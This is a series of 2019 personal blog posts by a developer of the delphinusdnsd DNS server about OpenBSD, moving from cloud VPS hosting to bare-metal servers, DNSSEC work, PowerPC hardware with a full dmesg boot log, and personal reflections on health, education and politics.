Today OpenBSD 6.5 was released and I have upgraded most VPS's. There was
some downtime on the webserver because I had a problem in the /etc/fstab
for the filesystems. I never noticed it before.
I donated 460 EUR to Theo and thanked him for his OpenBSD. This brings the
donations to just short of 1000 EUR for this year. I won't be able to
sustain this in coming years, but while I had the money it was worth it.
Fixed delphinusdnsd Linux port
April 25th, 2019
Tomorrows snapshot should compile Linux in the snapshots. I still haven't
tried NetBSD and FreeBSD but they will get fixed next over the course of
a few weeks. I'm unaware of any fall-out from this port, but it required
a lot of #ifdef's.
Something I found a while back about Enigma
April 25th, 2019
I thought this was cool. $7 to break enigma, awesome.
Sorry for the inconvenience
May 1st, 2019
Since yesterday's small outtage with the web server (is a screwup with the
hoster), the IPv6 doesn't work.
beta$ ping6 red
PING red.centroid.eu (2a01:4f8:1c0c:7b0c::180): 56 data bytes
64 bytes from 2a01:4f8:1c0c:7b0c::180: icmp_seq=0 hlim=52 time=12.867 ms
64 bytes from 2a01:4f8:1c0c:7b0c::180: icmp_seq=1 hlim=52 time=12.856 ms
^C
--- red.centroid.eu ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 12.856/12.862/12.867/0.006 ms
beta$ ping6 green
PING green.centroid.eu (2a01:4f8:c010:1dd1::1): 56 data bytes
^C
--- green.centroid.eu ping statistics ---
2 packets transmitted, 0 packets received, 100.0% packet loss
I opened a ticket yesterday that still hasn't been answered. Here is to
hoping they'll answer it by tomorrow (today is a holiday).
Switched off my NUC at home, Mac Mini is next
May 3rd, 2019
My NUC was doing IMAP mail, icecast streaming and DNS at home. I finally
moved its functions to other hosts/routers/switches. It will be used next
month to run Windows Server 2019 natively. I hope it has enough RAM, there
is only 4 GB. It's a core i3 NUC.
My Mac Mini will lose its function of running the Windows Server 2016 trial
on vmware. I'm going to wipe it and give it to my dad who wants to use it.
I also lose the itheatre and photobooth which I've been doing vlogs with.
But I'm hoping I can replicate this with my Macbook Pro.
Currently I'm trying to figure out how to get FreeBSD powerpc64 on my G5 and
dual boot it with OpenBSD. Booting off the memstick proves hard and I have
no empty non-rewritable CD's here (I have lots of rewritable ones). The Macs
never liked rewriteable media to boot with. Basically I'm very interested
how the G5 performs in 64 bit mode hence I want FreeBSD on it. I still have
OpenBSD on its SSD and this would be on the spinning disk.
Opened my eyes, since when is macppc port called PowerPC?
May 3rd, 2019
Take a look at these photos.
this one is right.
what's up with the "powerpc"? OpenBSD/macppc hasn't been called powerpc since
3.0 release. Furthermore this CD does not get accepted by a PowerMac and it
spits it out, like it would with a CD-RW. I find this highly odd and I wonder
if I got the right CD's here? Worthless plastic.. even for doing some console
work! Who swapped my CD's?
I gave away my last macppc machine a few years ago and just last year got a
G5 Powermac again. It's got more power but it also sucks a lot more energy.
Doodled the other day
May 8th, 2019
Here is a picture of Goldflipper how he'd look if he was human.
I don't know if I'm going to make it appear on the goldflipper.de website.
But it's on the blog. The picture is quite big you can open the image in
a new tab for full resolution.
Open Source in the Schweinfurt Area
May 10th, 2019
If you are living in the Schweinfurt area and are writing Open Source I'd like
to get to know you. I want to network with you, and set up a website much
like the Knot DNS website. I have
15 years under my belt writing on my own DNS server, and what knot and many
others are doing (PowerDNS, NLNetlabs) really impresses me. Show your work!
Let's see if we can set up a website that networks us as lower franconian
open sourcers.
New fixes in my modified Popa3d (with TLS 1.2)
May 11th, 2019
I have just committed last weeks changes for this.
Here is the
repo. These are some important changes.
Difference of (PowerPC) Stacks
May 14th, 2019
I have created this picture from documents regarding the 32-bit and
64-bit stacks. There is some differences there and I'm happy I got
help in finding me the 32-bit document.
I hope to be making the 64-bit asm workable with this knowledge.
Happy 10 years anniversary Centroid.EU blog!
May 16th, 2019
This is the last article
I found on this blog. It's been 10 years. This is actually the second
blog I had a centroid.eu blog shortly before this time. First I wrote this
blog in PHP and improved it over time. Finally a few years ago I converted
the PHP to C with kcgi (pledged and unveil'ed) and that's where we're at now.
Would you like me to sing happy anniversary? I devoted 10 years of my time
to this blog. It's not as much as I had devoted to some maintained programs
(such as delphinusdnsd), but it's a long track record. Thanks for being there
for me Centroid.EU blog! On to another 10 years!
Zombieload attack, it's getting nastier
May 16th, 2019
I'm evaluating whether it's good to leave the cloud. It's more money for sure, but I think I can handle that. The
attack is mentioned here. I'm waiting for word from one of my VPS
providers what they're doing to counter this. It's a decision that must
come from their higher ups because I expect them to turn off Hyperthreading
(SMT). This makes the hardware slower, and they'll have to activate more
servers for the VPSs. I'm going to see what happens by this weekend and
then make a final decision.
I have decided to go Bare-Metal
May 22nd, 2019
I'm leaving the cloud. At least for the foreseeable future. The VPS network
I set up last month is being transferred from 6 VPS's to 3 Bare-Metal servers.
I'm hoping the entire thing will cost under 50 EUR/mo which is a hike from
20 EUR/mo, but I'm getting more computing resources anyhow.
If you're reading this...
May 23rd, 2019
I have moved the website to another server. I hope nothing gets broken with
this. Stay tuned.
One day I'd like to use StarLink
May 24th, 2019
StarLink's
first 60 satellites were launched. I'm not sure of the consequences but other
than that I think it's a great idea!
UNIX is dead
May 25th, 2019
Yesterday, I watched this
youtube clip. I liked how Benno Rice nicely put the case of systemd (and
launchd) forward, without being insulting to anyone particularily. But his
words carried into my subconcious... UNIX is dead. AIX, Solaris, HP-UX are
all fairly dead. The BSD's remain in my opinion though, but will FreeBSD
embrace the systemd/launchd change?
Blogroll: Bruce Schneier reports of Germany wanting to ban End-End crypto
May 25th, 2019
Here is the article. I have no comment at this time. I do know however
that Germany is a police state. Sorry, it is.
Deleted a number of VPS's
May 27th, 2019
I have deleted blue, green, yellow and orange, and red I for some reason
couldn't delete, so I asked it to be deleted. This is all in an effort to
leave the cloud, as I have a bare-metal network now. Omega will be deleted
next week hopefully, it is the last VPS I have left that is in production.
Random ramblings, this time I reduced the size to 16MB!
Tags: Morning grumpyness, Alex Jones, Bilderberg, NUC, Windows 2019 Essentials, Zuckerberg, censorship, EU election, global agenda
The webserver was down yesterday for some time, it wasn't just you.
Domains for sale
June 4th, 2019
I have put the following domains for sale.
goldflipper.de
schweinfurtdating.de
solarscale.de
virgostar.net
I'm asking 100 EUR each or best offer. This would guarantee you getting the
domain before it's expired. Basically what happens is that domain squatters
probably take the domain for a while, as is usual. The domains were used
mostly for SMTP/e-mail and there may be mails going into these still. AFAIK
I have moved most important emails over to another address. Getting mails
from adult dating sites is not preventable but without a catchall SMTP
account a bounce would occur, as user.something was not used. Obviously I
do not want anyone re-using dating sites that I once used and the agreement
made will be that you do not make use of the emails to authenticate into these
sites. Otherwise it is a criminal offence under identity fraud laws. You're
getting a domain name, not a license to look into my past.
Solstice in 16 days (start of summer)
June 5th, 2019
The June solstice is upon
us again in 16 days. In Australia it's start of winter (even though they had
snow in
Queensland a few days ago), and here in Germany it's start of summer. I have
never been to an event like a druids gathering at stonehenge, and don't want to
either. But the day is special for sure.
The Government requires an app for purchases with CC on the Internet
June 8th, 2019
Last week I got a weird mail from my bank. They require that I download an
app, in order to do CC purchases online. It's government requirement. I'm
very concerned where this leads us, who has oversight of this app? Why did
I have to go back into setting to turn its camera permission off after I had
added my card? I'm worried about a deep state intrusion.
Delphinusdnsd has new TCP routines
June 8th, 2019
Before yesterday's change one could only connect 1 client at a time with
delphinusdnsd and it would block subsequent connections. Now up to 64
connections can connect simultaneously before the server simply hangs up any
new connections. It may have broken the Linux port in the snapshots, I'll
see if I can fix that next week. But it works on OpenBSD.
Possibly getting rid of Mac OS
June 9th, 2019
Apple has revealed that iTunes will go away. Depending how the outcome of
the new program and my DJ software will go, I may put OpenBSD on this MBP.
If the DJ software can't read any of the songs anymore I will discard Mac
OS, if not I will keep it. It's simple as that. iTunes basically determines
whether I stay or go on.
In order to run OpenBSD on this laptop I may have to mod it a little. I'll
have to get a USB<->ethernet adapter that works with OpenBSD as I don't think
the thunderbolt adapter that I have will work. Also I don't think the built-in
wifi will work. I'll have to go with my small urtwn(4) devices which don't do
5 Ghz, and have little range.
It's a shuffling around of a lot of things. But it's Apple that initiated it.
Maybe it's better for privacy this way after all.
Got two books on post-quantum cryptography
June 10th, 2019
This subject was lacking in my book collection. One is from 2010 and the
other was pre-ordered it will publish in november. One thing to note is that
I did not order from amazon (who is getting worst and worst for books).
Finished migrating from the cloud
June 11th, 2019
I have left the cloud behind. This morning I deleted omega.virgostar.net,
it was my last bastion in cloud-land. The provider was VULTR. I still
have 21 dollars in my account there. I wonder if it'll be there in 4 years
when I return to the cloud.
The reason I left the cloud is because I require privacy. Cloud computers
such as VPS's could not guarantee that to me so I set up a network of dedicated
servers. It's a lot more money. But noone is gonna read my communications
for 5 dollars a month via vulnerabilities such as spectre and zombieload.
In 4 years a lot of things can change, and if bare-metal servers become ultra
cheap I may never return to cloud land. We'll see.
My donations to OpenBSD 2009-2019
June 13th, 2019
I made record keeping on this Blog to OpenBSD. I have recorded 2719 EUR of
donations over the past decade. But since 2010 and 2011 has no data this is
off. I'm suspecting I'm hitting near 3000 EUR and on average about 300 EUR
a year. Here is 2 pretty graphs that I made with Libreoffice (on OpenBSD).
So here I stand as an OpenBSD fanboy. But it's fun! I think I was born to
donate money. BTW 3000 EUR is 4517 CAD so if all my donations were recorded
in one year as a donation I would miss Bronze contribution ($5000-$10,000) by
500 dollars (check out 2019's contributions).
However good this decade was in donations, the next decade may be a little
softer, since I'm unsure if I'll get work in the 2020's. It's happened before
in the Y2K decade (2000-2010) that I spent the lions share out of work. I'll
see roughly what the status is with donations to OpenBSD in 2020,
near january 2020.
Money invested in OS's since 1990
June 13th, 2019
I'm in a graphing mood. This is an estimation how I invested my money into
operating systems since 1990.
Windows is on a comeback and I didn't include vmware which made a few OS's
work on other platforms than bare-metal.
Olympic 76 Pizza in Toronto
June 14th, 2019
As you may or may not know I lived in Toronto from 1994 until 2002. I was
involved in physical gatherings with people regarding digital things (like
OS fan-clubs) slightly. I went to GTABUG and TORLUG meets.
Next week in Toronto is the last GTABUG meet
held at Olympic 76 Pizza on Gloucester Street 8, as the Pizza joint is closing.
The pizzeria was a fine setup (with red table cloths) with good pizza and
refreshments in the Wellesley and Yonge area.
I was with the starting team
that went to the very first meeting there in 1999 or so. GTABUG was founded
by Dan Moschuk (RIP) and Geoff Robinson, who drove me to the event if I
remember correctly. It was near the end of my time at GlobalServe.net an ISP
in the Toronto area, and I remember I had a printout with me for some program
I wrote there. Much irrelevant and the program wasn't all that great in
retrospect we still had a great time.
Geoff Robinson took off (I think he went to Manitoba) after he successfully
sued the company I worked at after Globalserve, Click2Net.com, for a high
amount of money (In the millions). It and the fact that the dot-com industry
was tanking, pretty well ended any successful continuization of Click2Net.
I left there in 2001 some time and the company was around for a bit longer
than 9/11. I'm glad I retained contact with the owner, since he gave me a
job later at easyofficephone.com. But that's all different topics.
Coming back to GTABUG, we sometimes met at Finch and Yonge at a Japanese diner
who served Fugu. I remember being there once or so. I had teriyaki, I think
although after that I turned vegetarian for a while, and we were back in
76 Olympic eating veggy pizza. Sad to never being able to go to another
Olympic 76 Pizza meet I'll end this article now. Toronto is a happening place
and I'm getting thoughts of perhaps starting a BSD user group in Schweinfurt,
although maybe 1 or 2 people may show up only it may not be worth it.
Noone has a right revoking Internet on us
June 17th, 2019
I recently flipped through a sueddeutsche zeitung of my parents and came across
an advertising of a book advertising the revokation of the Internet because of
Google, Facebook, Amazon and co. There is a major problem in that viewpoint.
If you want something better you have to make it yourself! Just complaining
will not get you anywhere and you'll notice that you are the problem and not
these sites. I think the frustration of many is that they cannot shape the
Internet in artful ways, they lack the expertise to program themselves which
is a high form of expression leaning on maths and languages. They lack this.
Thus they cannot make their own crafts. They are trapped in a facebook world
made for them. This is very sad. I left facebook in 2011 sometime because I
couldn't stand the facebook soup, and the fact that facebook placed themselves
between me and my friends. Sorry. Maybe facebook is good for some, but not
for me. But I don't wish the death of the Internet because of that!
Last statement: Stop trying to revoke the Internet on others and do something
positive with the Internet so that you find a sense of belonging with it!
Current Internet methods are counter-productive
June 17th, 2019
An article in the Mainpost (mainpost.de, paywalled)
was made aware to me by my mother. This is a very difficult topic because it
gets emotional very quickly in a group. Thankfully it's just me writing this
article and I'm biased toward Freifunk or free networking compared to locked
down networks such as 5G networks. There is a few people like me that believe
the ultimate Internet is a community network where freedoms exist and don't
get eroded by private, corporate or state interests. We want a network, that
is
democratic (everyone participates)
doesn't have ongoing costs and is free after initial investment
doesn't have upload and download limits
is secure and encrypted
is easy to work with and has a wireless component
I live in a neighbourhood where there is 7 or 8 buildings with 6-10 units of
apartments in each. Everyone has a router at home that does wifi and the
beaconfire is incredible how much AP's are in the vicinity. It worries one
about the purpose of all. (BTW with a program to measure how many devices
are in the vicinity I counted around 50 AP's and over 1000 smart phones that
walk by in a period of 5 hours). In my proposal I would have the following
components for this entire building project:
an Enterprise access point on each building preferably with antenna on the
rooftop for increased range
A building router and building switch, vlan and lan components to give a
private net and a public net for exchanging between buildings, neighbourhood
and city
cat6 cabling to every room eliminating wifi signals
cabling between the buildings with networking preference over the Wifi
components
Lifi networking devices in each room
given all this I think there is no need anymore for 5G networking when most of
it is cabled, wifi and lifi. Think about it and discuss.
Tomorrow is Solstice
June 20th, 2019
Longest day of the year in the northern hemisphere.
Living with Schizophrenia: Whatever happened to AripiPan?
June 23rd, 2019
This is a continuization of this article, somewhat.
I spoke with my Psychiatrist last time I was there about Aripipan which is a
drug I used to take that contained Aripiprazol (aka abilify). One day, a few
years ago my health insurance stopped/blocked me taking Aripipan, and I
mentioned that to my Psychiatrist (it keeps popping up in conversation, last I
asked her last month). She checked her computer system and it's
not on the list of offered medications for me (or everybody?) anymore.
To recollect I have taken these following medications since 2002. In no
particular order:
Luvox
Zeldox
Zyprexa
Abilify (Aripiprazol during patent)
Aripipan (Aripiprazol after patent expiration)
Aripoya (Aripiprazol after patent expiration)
So what happened to Aripipan? One benefit those pills had was they were
just the right size to swallow, and I felt generally pretty good with it.
The pharmacists though told me my health insurance does not want me to take
aripipan for unknown reasons.
So how is my health? I'd say it's deteriorating, I've had problems with a
fungus and my weight. Last week I had psychosomatic symptoms over a possible
trojan on my system and had to barf. Turned out the trojan was my tax
software and I complained to them. I'm not going to keep the OS much longer
after some time.
It's hot! 31.8C currently
June 25th, 2019
I've done my shopping for today and tomorrow when temperatures are supposed
to reach 35C (forecasted). On thursday morning I'll probably have to get
more drinks at the supermarket.
What is a degree worth?
June 26th, 2019
When I went to college in 1995/1996 I screwed up. But it wasn't just me
alone. I found one college in particular to be incompetent and only there
seemingly to give the professors jobs. I realised this along with the fact
that this particular college was trying to push me out. I was insane and
they might have known it. It also didn't help I didn't have a stable home,
I lived in a basement apartment at the time and had no family in Canada
in my immediate vicinity. In 1997 I got my first job as a system
administrator and paid off my student debts (roughly 2 semesters worth) with
in one year. It was shitty pay there, but I was hoping on continuance as a
system administrator. That wish never came to fruition and I've been placed on
again off again in the job market over the last 22 years.
Why am I writing this? It's because Bernie Sanders in the USA wants to
forgive the student debt of people worth 1.2 Trillion dollars. If the USA is
anything like Canada all those people who went to a post secondary education
have amassed debts to go to colleges, but they also pushed out others who
became known as the college dropouts, who went into industry immediately
(like me) who tried to balance their bank books. The damage is done. Those
that have hundreds of thousands of dollars in student debt can't pay the
debt and need to be forgiven as the pressure is just too great and their
talent wasted on worries over money. But it leaves the dropouts at a
disadvantage. So what to do? Here is a
link
on slashdot about two-thirds of american employees regretting their college
degree.
In the meanwhile I'm living in Germany, a country that has free post-secondary
education. It's next to impossible to find work without a degree here, but on
the other hand the germans are on this trip that they think they are the best.
It's frustrating for me because I know I'm not incapable. When I came back
here at age 26 I was too old to go back to school I felt. Also I had problems
with my mental health and that was priority #1 to fix. The schooling system
everywhere is broken it seems to me, and this attitude that someone is better
than someone else just becuase they are from another place is wrong too.
I'm pretty sure over 50% of things that I can do can be immediately filled by
someone from a third world country. Also if you know how to google you can
do most tasks I did at former jobs. The reason people need to google is that
things change. Different OS's, different languages, different approaches and
new technologies. Especially the tech sector is moving extremely fast.
So I'm done dishing out insults to everyone. :-) Maybe it's not like I see it
but if you were in my shoes, you'd realise things are complicated. Good luck
to all those that are in debt, good luck to those that are not in debut but
don't have a formal degree, and good luck to everyone in realising a better
education system that works for all.
Delphinusdnsd has a new config keyword: mzone
June 26th, 2019
mzone allows finer grained control of replication servers
(or also called slave servers). I took the "notify" keyword out of the
config and new versions after this date will error on the old notify config.
Here is my test mzone config:
it is stuck into the config file and zone keywords still exist (they hold
the zone data). I'm not sure if I want to make a zinclude inside a mzone.
This is work in progress, and some things may still change. I'm aiming
to release version 1.4 of delphinusdnsd in late december.
Delphinusdnsd on OpenBSD is safer
June 28th, 2019
I have added conceal memory allocation routines. This will protect keys
when/if the daemon crashes and leaves behind a corefile. The
tsig.c changes are here as an example.
I'm also considering shielding these keys from rowhammer and spectre attacks
as is done by openssh. But the code for that isn't exactly simple to do in
half an hour. It'll take some time. Hurray!
Delphinusdnsd does Algorithm 13 DNSSEC
July 5th, 2019
I was working all week on this. I finally got it finished today. The test
zone that is using the algorithm 13 signed zone is "schweinfurtdating.de".
DNSVIZ.net seems to agree that it is correctly signed, so will verisign
DNSSEC debugger. What prompted me to write this this week? On monday
I happened to update my RFC's and the last one was RFC 8624, which is on
the standards track and says to be compliant one MUST support algorithm
8 and 13. Well I got both now.
I also upgraded algorithm 8 to use 3072 bit keys, and while there fixed a
problem with bitmaps in NSEC3 records. While it may not have mattered for
forward lookups in denial of existance it might have caused problems.
Anyhow I'm celebrating now that I know a bit more about Elliptic Curves and
how to program them with LibreSSL. Rejoice!
The next 15 years of my life
July 7th, 2019
God willing, I'll live to see another 15 years of my life pass. I have done
some estimates on what I'm facing when I turn 58. If I get a stable job that
allows me to put away savings I'll have made 100K EUR in savings. This is at
the rate that I managed to save 44K EUR in 8 years, from 2010-2018. It isn't
much in any sense, but my goal is to have at least 100K EUR saved by the time
I'm 58. When I'm 58 I'm too old to start a programmer or sysadmin job. I'll
be more of the age of a manager, and perhaps that's where the 100K will flow
to, a business. I didn't start a business last year because I felt I wasn't
ready and 44K wasn't all that much, as you can see it's almost 2020 at which
point I'm expected to have spent most of it, the money goes quickly meaning
to me 44K really isn't jack shit money. But I do the best we can with little
money. The 15 years is also the time I have devoted for the delphinusdnsd
project to live on. What will the daemon look like in 15 years? I can only
guess. I know however after a 30 year development cycle it's time to stop
delphinusdnsd. It may be a bit of a waste, or it may be worth it. Time
will tell. Also let's look at some events that will happen in the next 15
years. Moon landing, first woman on the moon, perhaps Mars landing.
Definitely SpaceX Starlink will be complete half way through. We won't have
hit the 2038 problem but we will see the time_t roll over to 2 billion in
May 2033. 15 years will go quickly, I hope to make it there.
Have you ever planted a tree? I have.
July 9th, 2019
It must have been around 1992 when I planted a tree with my mother. Today
I can see that tree from google maps satellite link. It's close to 28 years
old, and it's fantastic. About 15-20 meters high, and providing lots of
shade in the summer. In winter the shade is not there, really and it's not
needed. As we turn on earth into the 2020's trees are really needed. We
need lots of trees. Maybe you'll plant one?
Angela Merkel shaking again (3rd time)
July 10th, 2019
Publically Angela Merkel is shaking again. This isn't normal, I think. I'd like an explanation
whether she's still fit to lead Germany. What's wrong with the Chancellor?
H2 vs. I=V/R cars?
July 13th, 2019
I=V/R is the formula for Ohm's law, where current (in amps) is I, Volts are
expressed as V and resistance in Ohms is expressed as R. What I mean by a
I=V/R car is an electric car. H2 is Hydrogen, so a hydrogen car. Which is
better? Really put they are one and the same. Only one has lithium or other
batteries and the other has a tank of Hydrogen probably gellafied and
compressed. The Hydrogen car uses a fuel cell to convert the hydrogen (with
oxygen) to water which produces also heat and electricity to power the car
to move from point A to point B. A Lithium battery also gets hot when a car
discharges it quickly enough, or when charged. These are 1st semester college
basics and really aren't hard to understand. You're getting an electric car
with different storage mediums. Really.
Cute would be if electric car manufacturers were to build their cars in such a
fashion that you can add a tank of hydrogen and a fuel cell at a later time.
Schweinfurt saw a hike of 0.10 EUR in public Bus fare
July 13th, 2019
This just last week. I remember it wasn't all that long ago since we also
had a fare hike. Probably in 2017. With a carbon tax they'll likely raise
it again. So what I'd really like is electric busses.. Where are all the
electric busses? And Airconned busses too. We have a right to this!
Purchased Quad PCI-X Ethernet card
July 15th, 2019
For my G5 Mac Pro I have purchased this ethernet card (from em(4) manpage):
Intel PRO/1000GT Quad PCI-X Adapter (PWLA8494GT)
I have use for this card hopefully in 2 years when I want to do a prototype
network for a network-memory server utilizing delphinusdnsd (which would be
modified). Milestones that I still need is a powerpc64 port for OpenBSD. So
I have roughly 2 years to get this hardware to 64-bit. I'll need it becuase
I want to go beyond 4 GB memory with this thing.
What needs to be done, Trends I see
July 16th, 2019
We're getting a carbon tax on oil. This will make everything more expensive.
If you don't realise this, then you haven't thought this through. Oil is not
an infinite thing, it is limited, and as they say "we've reached peak-oil".
That means the low-hanging fruits have been picked (if oil were cherries). The
thirst for oil has to be replaced with a thirst for electricity. Trucks that
deliver food and drinks need to be replaced with their electric counterparts.
Only then will the cost of groceries stay low. So then if we use electric or
hydrogen driven trucks something has to produce the electricity (to produce
the hydrogen), we have to massively invest (keyword invest) in solar and wind
to cover the energy. Anything but solar and wind is not really kosher. Let
the sun handle it.
This will make many poor. The advent of oil (end of oil), will hit the poor
and middle classes tremendously and cause more poverty. Rich people, those
who have something, can probably survive. One trend I see is that employers
are offering living units again. In the 1940's through 1970's, particularily
in Germany, there existed worker apartment units ("arbeiterwohnungen"). These
will make it back I'm pretty sure because they are a good thing. There already
is one major employer (germany's biggest in the service industry) Die Bahn, who
are the railway company, who are again offering worker apartments. If you're
lucky enough to work for them you'll get a unit. This also counters the
apartment crisis we're having in Germany due to high demand.
So the foreseeable trend is that a corporation will manage an apartment building
or buildings to house it's employees. This makes more sense than giving the
employees a car, or a phone. Hopefully it's not abused to demand more
productivity. Those businesses would have a high turnover rate anyhow and
noone would live and work with them. It counters the oil shortage for sure.
It's only fair. It can go further too by offering electric shuttle busses to
from the place of work. For me it'd be hard because all I'm ever used to is
small companies and start-ups. Startups likely won't be offering this but
you can surprise me. Personally I'd like to work for Siemens or some place
like that and have them give me the apartment, and transportation to work. It
would be nice for a change.
Getting conflicting information from the web
July 16th, 2019
Either the slots in my G5 (7,3 Niagara DP 1.8 GHz) are 32 bit PCI or full
length PCI-X slots. I'm not sure here there is a lot of conflicting
information. Here is a photo:
In several documents here (wikipedia), here (apple.com), and here (apple.com) it says different
things. Finally the card I bought here (intel.com) says it's compatible with PCI 32-bit 33 MHz, but that would suck. I was trying to determine which is the PCI-X
133 MHz slot and only one apple link (above) said that it's on slot 4. So I
will plug it in slot 4 (AGP is slot 1), and see if it's at 133 MHz. At which
point I'll enjoy a full 8 Gbit/s bandwidth to the card. If it turns out to be
a PCI slot in disguise as a PCI-X slot then I'll be only able to use 2 RJ45
cables to this card which would suck. BTW this chart(wikipedia.org) seems really cool.
Got the quad em(4) card
July 17th, 2019
DHL brought this card today. I didn't find a dmesg for iota so I'll post it
now with this card inserted on slot 4 (the 133 MHz PCI-X port):
[ using 1273368 bytes of bsd ELF symbol table ]
console out [NVDA,Display-B] console in [keyboard], using USB
using parent NVDA,Parent:: memaddr 98000000, size 8000000 : consaddr 98004000 \
: ioaddr 91000000, size 1000000: width 1920 linebytes 2048 height 1080 depth 8
Copyright (c) 1982, 1986, 1989, 1991, 1993
The Regents of the University of California. All rights reserved.
Copyright (c) 1995-2019 OpenBSD. All rights reserved. https://www.OpenBSD.org
OpenBSD 6.5 (GENERIC.MP) #0: Fri May 3 18:45:47 CEST 2019
pjp@iota.centroid.eu:/usr/src/sys/arch/macppc/compile/GENERIC.MP
real mem = 0 (0MB)
avail mem = 2020343808 (1926MB)
mpath0 at root
scsibus0 at mpath0: 256 targets
mainbus0 at root: model PowerMac7,3
cpu0 at mainbus0: 970FX (Revision 0x300): 1800 MHz
cpu1 at mainbus0: 970FX (Revision 0x300): 1800 MHz
mem0 at mainbus0
spdmem0 at mem0: 1GB DDR SDRAM non-parity PC3200CL2.5
spdmem1 at mem0: 1GB DDR SDRAM non-parity PC3200CL2.5
spdmem2 at mem0: 1GB DDR SDRAM non-parity PC3200CL2.5
spdmem3 at mem0: 1GB DDR SDRAM non-parity PC3200CL2.5
memc0 at mainbus0: u3 rev 0xb3
kiic0 at memc0 offset 0xf8001000
iic0 at kiic0
lmtemp0 at iic0 addr 0x4a: ds1775
maxtmp0 at iic0 addr 0x4c: max6690
maxtmp1 at iic0 addr 0x4e: max6690
"cy28508" at iic0 addr 0x69 not configured
"cy2213" at iic0 addr 0x65 not configured
fcu0 at iic0 addr 0xaf
"pca9556" at iic0 addr 0x18 not configured
adc0 at iic0 addr 0x2c: ad7417
"24256" at iic0 addr 0x50 not configured
"pca9556" at iic0 addr 0x19 not configured
adc1 at iic0 addr 0x2d: ad7417
"24256" at iic0 addr 0x51 not configured
"dart" at memc0 offset 0xf8033000 not configured
"mpic" at memc0 offset 0xf8040000 not configured
mpcpcibr0 at mainbus0 pci: u3-agp
pci0 at mpcpcibr0 bus 0
pchb0 at pci0 dev 11 function 0 "Apple U3 AGP" rev 0x00
appleagp0 at pchb0
agp0 at appleagp0: aperture at 0x0, size 0x10000000
vgafb0 at pci0 dev 16 function 0 "NVIDIA GeForce FX 5200 Ultra" rev 0xa1
wsdisplay0 at vgafb0 mux 1: console (std, vt100 emulation)
wsdisplay0: screen 1-5 added (std, vt100 emulation)
ht0 at mainbus0: u3-ht, 6 devices
pci1 at ht0 bus 0
hpb0 at pci1 dev 1 function 0 "Apple U3" rev 0x00: 85 sources
pci2 at hpb0 bus 1
macobio0 at pci2 dev 7 function 0 "Apple K2 Macio" rev 0x60
openpic0 at macobio0 offset 0x40000: version 0x4614 feature 770302 LE
macgpio0 at macobio0 offset 0x50
"pmu-interrupt" at macgpio0 offset 0x9 not configured
"programmer-switch" at macgpio0 offset 0x11 not configured
"modem-reset" at macgpio0 offset 0x1d not configured
"modem-power" at macgpio0 offset 0x1e not configured
"fcu-interrupt" at macgpio0 offset 0x15 not configured
"fcu-hw-reset" at macgpio0 offset 0x3a not configured
"slewing-done" at macgpio0 offset 0x23 not configured
"codec-input-data-mux" at macgpio0 offset 0xb not configured
"line-input-detect" at macgpio0 offset 0xc not configured
"codec-error-irq" at macgpio0 offset 0xd not configured
"dig-hw-reset" at macgpio0 offset 0x14 not configured
"line-output-detect" at macgpio0 offset 0x16 not configured
"headphone-detect" at macgpio0 offset 0x17 not configured
"codec-irq" at macgpio0 offset 0x18 not configured
"headphone-mute" at macgpio0 offset 0x1f not configured
"amp-mute" at macgpio0 offset 0x20 not configured
"hw-reset" at macgpio0 offset 0x24 not configured
"line-output-mute" at macgpio0 offset 0x25 not configured
"codec-clock-mux" at macgpio0 offset 0x26 not configured
"escc-legacy" at macobio0 offset 0x12000 not configured
zs0 at macobio0 offset 0x13000: irq 22,23
zstty0 at zs0 channel 0
zstty1 at zs0 channel 1
kiic1 at macobio0 offset 0x18000
iic1 at kiic1
aoa0 at macobio0 offset 0x10000: irq 30,1,2
"timer" at macobio0 offset 0x15000 not configured
adb0 at macobio0 offset 0x16000
apm0 at adb0: battery flags 0x9, 0% charged
piic0 at adb0
iic2 at piic0
"fans" at macobio0 offset 0x4c not configured
audio0 at aoa0
ohci0 at pci2 dev 8 function 0 "Apple K2 USB" rev 0x00: irq 27, version 1.0, legacy support
ohci1 at pci2 dev 9 function 0 "Apple K2 USB" rev 0x00: irq 28, version 1.0, legacy support
usb0 at ohci0: USB revision 1.0
uhub0 at usb0 configuration 1 interface 0 "Apple OHCI root hub" rev 1.00/1.00 addr 1
usb1 at ohci1: USB revision 1.0
uhub1 at usb1 configuration 1 interface 0 "Apple OHCI root hub" rev 1.00/1.00 addr 1
ppb0 at pci1 dev 2 function 0 "Apple U3" rev 0x00
pci3 at ppb0 bus 5
bwi0 at pci3 dev 1 function 0 "Broadcom BCM4306" rev 0x03: irq 57, address 00:11:24:9c:01:82
ppb1 at pci3 dev 4 function 0 "Pericom PI7C21P100 PCIX-PCIX" rev 0x01
pci4 at ppb1 bus 6
em0 at pci4 dev 4 function 0 "Intel 82546GB" rev 0x03: irq 54, address 90:e2:ba:25:47:cc
em1 at pci4 dev 4 function 1 "Intel 82546GB" rev 0x03: irq 54, address 90:e2:ba:25:47:cd
em2 at pci4 dev 6 function 0 "Intel 82546GB" rev 0x03: irq 54, address 90:e2:ba:25:47:ce
em3 at pci4 dev 6 function 1 "Intel 82546GB" rev 0x03: irq 54, address 90:e2:ba:25:47:cf
ohci2 at pci3 dev 11 function 0 "NEC USB" rev 0x43: irq 63, version 1.0
ohci3 at pci3 dev 11 function 1 "NEC USB" rev 0x43: irq 63, version 1.0
ehci0 at pci3 dev 11 function 2 "NEC USB" rev 0x04: irq 63
usb2 at ehci0: USB revision 2.0
uhub2 at usb2 configuration 1 interface 0 "NEC EHCI root hub" rev 2.00/1.00 addr 1
usb3 at ohci2: USB revision 1.0
uhub3 at usb3 configuration 1 interface 0 "NEC OHCI root hub" rev 1.00/1.00 addr 1
usb4 at ohci3: USB revision 1.0
uhub4 at usb4 configuration 1 interface 0 "NEC OHCI root hub" rev 1.00/1.00 addr 1
ppb2 at pci1 dev 3 function 0 "Apple U3" rev 0x00
pci5 at ppb2 bus 2
kauaiata0 at pci5 dev 13 function 0 "Apple K2 ATA" rev 0x00
wdc0 at kauaiata0 irq 39: DMA
atapiscsi0 at wdc0 channel 0 drive 0
scsibus1 at atapiscsi0: 2 targets
cd0 at scsibus1 targ 0 lun 0: ATAPI 5/cdrom removable
cd0(wdc0:0:0): using PIO mode 4, DMA mode 2, Ultra-DMA mode 4
"Apple K2 Firewire" rev 0x00 at pci5 dev 14 function 0 not configured
ppb3 at pci1 dev 4 function 0 "Apple U3" rev 0x00
pci6 at ppb3 bus 3
